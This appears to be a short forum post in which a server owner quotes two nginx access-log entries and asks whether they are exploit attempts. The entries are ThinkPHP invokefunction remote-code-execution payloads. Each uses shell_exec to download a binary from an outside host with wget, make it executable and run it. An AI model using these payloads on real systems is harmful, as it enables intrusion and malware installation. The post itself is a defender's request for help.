I was just looking my nginx access.log logfile and found this
"GET /index.php?s=/index/\x09hink\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://fay[0/1795]
dns.org/thinkphp -O /tmp/.xfck; chmod 777 /tmp/.xfck; /tmp/.xfck' HTTP/1.1" 400 166 "-" "Unstable/2.0"
and
"GET /index.php?s=/index/\x09hink\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://37.49.231.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1" 400 166 "-" "Uirusu/2.0"
Some exploit injection?